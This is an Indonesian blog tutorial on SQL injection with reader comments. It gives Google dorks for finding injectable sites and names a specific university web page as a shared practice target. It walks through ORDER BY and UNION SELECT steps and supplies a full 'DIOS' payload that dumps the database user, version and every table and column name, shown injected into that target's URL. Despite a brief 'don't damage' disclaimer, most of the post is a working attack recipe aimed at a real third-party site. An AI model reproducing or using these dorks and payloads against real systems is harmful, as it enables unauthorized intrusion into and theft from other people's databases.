Tutorial SQL INJECTION, lengkap dengan Dios!!
hai semua, perkenalkan saya ./notitle
saya disini ingin memberikan sediit tutorial SQL injection, tolong jangan di skip ya baca hingga tuntas :)
Note:website tidak untuk dirusak, lebih baik ketika kita menemukan bug nya, langsung kita laporkan ke developer nya :)
and.... untuk bahan bahan nya, kita hanya menggunakan web browser kita masing masing.
okey kita lanjut ke tutorial nya ')sebelum melakukan kegiatan ini, lebih baik nya kita pahami dulu apa itu SQL, fungsinya apa. sebab jika kita melakukan kegiatan ini... akan sia sia saja okeh :).
okeh tanpa basa basi lagi kita lanjutkan ke tutorial nya...
pertama:siapkan website yang sudah terdapat parameternya, untuk website mungkin kalian bisa dorking menggunakan dork yang telah tersedia :)
- dork dork nya:
- inurl:/berita.php?id=
- inurl:/index.php?id=
- inurl:/news.php?id=
- inurl:/category.php?id=
untuk disini, saya punya target sendiri, teman teman juga bisa memakai target saya, dengann syarat kalian tidak boleh merusak nya okeh :)
silahkan kalian buka dengan browser kalian masing masing, targetnya: silahkan klik disini :)
dan disini kita sudah dihalaman target yang kita ingin pentest, seperti ini tampilannya.
lalu bagaimana selanjutnya?? dan apa saja yang harus kita lakukan??, disini kita akan menggunakan metode get data, lalu bagaimana caranya silahkan kalian klik lagi url yang ada di atas itu, lalu kita kasih kutip satu di parameternya contoh:
lalu kita jalankan lagi webrowser nya maka tampilannya akan eror seperti ini:
sebenarnya untuk tampilan eror banyak variasinya, mulai dari ada tulisan, you have an error BLA BLA BLA, dan konten nya menghilang, dan seperti gambar yang diatas itu, tapi untuk 404 itu tidak berlaku ya :)
okeh kita lanjut untuk balancing nya, caranya seperti apa?, kita tambahkan --+- setelah %27 itu, contohnya seperti ini:
lalu kita jalankan lagi webrowser nya, maka tampilannya seperti ini:
yah.... tampilannya masih eror guys...., yang saya mau-in tuh... webnya kembali normal :( karna kalau masih eror percuma saja kita lanjutkan cara berikutnya :(, lalu caranya seperti apa?, kita hapus %27 itu, contoh:
asik... web nya udah bener seperti semula, maka.... selanjutnya kita ke cara berikutnya, yaitu menambahkan order by 1 setelah parameternya, contoh:
lalu kita naikkan angka nya 1 persatu hingga web nya eror lagi contoh:
http://cs.newpaltz.edu/e/b-f20-01/p1s5/cart.php?id=1%20order%20by%201--+-http://cs.newpaltz.edu/e/b-f20-01/p1s5/cart.php?id=1%20order%20by%202--+-
http://cs.newpaltz.edu/e/b-f20-01/p1s5/cart.php?id=1%20order%20by%203--+-
http://cs.newpaltz.edu/e/b-f20-01/p1s5/cart.php?id=1%20order%20by%204--+-
http://cs.newpaltz.edu/e/b-f20-01/p1s5/cart.php?id=1%20order%20by%205--+-
http://cs.newpaltz.edu/e/b-f20-01/p1s5/cart.php?id=1%20order%20by%206--+-
dan web nya eror pas kita kasih order by 6.
lalu kita hapus order nya, dan kita tambahkan union select 1,2,3,4,5--+- , karna eror di angka 6, maka kita pilih sampai angka 5 saja ya guys :) contoh:
maka ketika kita jalankan webrowser nya... maka tampilannya seperti ini
lah kok gak ada angka togelnya, jika gak ada angka nya... Maka kita tambahkan min dibelakang parameternya, contoh:
maka akan ada angka togelnya :) seperti gambar dibawah ini:
maka kita bisa memasukan Dios nya di angka 1,2,3 untuk Dios silahkan ambil dibawah ini!! :)
concat(sysdate(),0x3c62723e,@@HAVE_SYMLINK,0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,version(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))maka kita masukan saja Dios nya seperti ini
http://cs.newpaltz.edu/e/b-f20-01/p1s5/cart.php?id=-1%20union%20select%201,concat(sysdate(),0x3c62723e,@@HAVE_SYMLINK,0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,version(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5--+-maka hasilnya akan seperti ini :)
cukup sekian materi ini, jangan kalian rusak, dan jangan kalian lakukan dengan hal hal yang aneh!! ingat!! semua kegiatan kalian bukan tanggung jawab pembuat materi!!
Heker bangettt
BalasHapusSeorang cendikiawan ahli c*li banyak bacod :v
HapusGuud
BalasHapus